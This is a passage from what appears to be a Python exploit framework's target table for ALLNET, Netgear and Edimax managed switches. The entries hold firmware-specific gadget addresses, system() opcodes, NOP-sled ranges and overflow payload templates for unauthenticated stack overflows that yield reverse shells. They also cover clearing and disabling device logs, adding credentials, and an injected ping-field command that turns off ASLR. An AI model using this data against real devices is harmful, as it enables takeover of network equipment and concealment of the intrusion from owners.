cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x412ADC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x412A24,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x412A24,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x40FA74,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x40FA74,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x40FA74,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# ALLNET GmbH Computersysteme \r\n\t\t\t# Not JSON based SG8xxx\r\n\t\t\t# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-50100': {\r\n\t\t\t\t'template':'ALLNET',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.1.1-R3-B1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'ALL-SG8310PM',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.allnet.de/en/allnet-brand/produkte/switches/entry-line-layer2-smart-managed-unamanged/poe-switches0/p/allnet-all-sg8310pm-smart-managed-8-port-gigabit-4x-hpoe',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C74C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x46BB04,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x46F240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x46F240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x426724,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x426724,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424D28,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),\r\n\t\t\t\t\t# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:\r\n\t\t\t\t\t# \r\n\t\t\t\t\t# NOP's\r\n\t\t\t\t\t# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00\r\n\t\t\t\t\t# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP' :0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Netgear inc.\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : No (logging do not exist)\r\n\t\t\t# Del /var/log/flash.log : No (logging do not exist)\r\n\t\t\t# Del /mntlog/flash.log : No (logging do not exist)\r\n\t\t\t# Add credentials : No (Single account only)\r\n\t\t\t# Del credentials : No (Single account only)\r\n\t\t\t#\r\n\t\t\t'609-31457': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS750E ProSAFE Plus Switch',\r\n\t\t\t\t'uri':'https://www.netgear.com/support/product/gs750e.aspx',\r\n\t\t\t\t'version':'1.0.0.22',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'caesar',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&password=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&password=' + self.random_string(320) + '&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x4102F8,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f9984fc,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840c6c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x10001210,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x10006210,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 50,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 79,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'query':'{\"_ds=1&password=' + self.random_string(316) + '_RA_START&shellcode=_USRNOP_SHELLCODE&_de=1\":{}}',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Netgear inc.\r\n\t\t\t#\r\n\t\t\t# Note: \r\n\t\t\t# 'username' is vulnerable for stack overflow\r\n\t\t\t# 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)\r\n\t\t\t# Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'\r\n\t\t\t# 'hash=<MD5>' tailing all URI's\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : No\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : No\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : No\r\n\t\t\t# Del credentials : No\r\n\t\t\t#\r\n\t\t\t'639-98866': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',\r\n\t\t\t\t'uri':'https://kb.netgear.com/000060184/GS728TPv2-GS728TPPv2-GS752TPv2-GS752TPP-Firmware-Version-6-0-0-45',\r\n\t\t\t\t'version':'6.0.0.45',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'hash_uri':True,\t# tailed 'hash=' md5 hashed URI as csrf token\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# \r\n\t\t\t\t\t\t'gadget': 0x45678C,\t\t\t\t# Direct heap address for NOP slep and shellcode\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99853c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484ae5c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'639-73124': {\r\n\t\t\t\t'template':'Netgear',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',\r\n\t\t\t\t'uri':'https://www.netgear.com/support/product/GS752TPv2#Firmware%20Version%206.0.0.37',\r\n\t\t\t\t'version':'6.0.0.37',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'hash_uri':True,\t# tailed 'hash=' md5 hashed URI as csrf token\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t},\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# \r\n\t\t\t\t\t\t'gadget': 0x45778C,\t\t\t\t# Direct heap address for NOP slep and shellcode\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998538,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484afec,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EdimaxPRO\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-63242': {\r\n\t\t\t\t'template':'Edimax',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS-5424PLC',\r\n\t\t\t\t'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',\r\n\t\t\t\t'version':'1.1.1.5',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411bc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40DFF4,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41D99C,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41D8E4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41D8E4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x41620C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x41620C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x41620C,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\t\t\t# Not clear, may be to long URI for the stack\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'225-96283': {\r\n\t\t\t\t'template':'Edimax',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'model':'GS-5424PLC',\r\n\t\t\t\t'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',\r\n\t\t\t\t'version':'1.1.1.6',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411ac,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40E024,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41D9EC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41D934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM 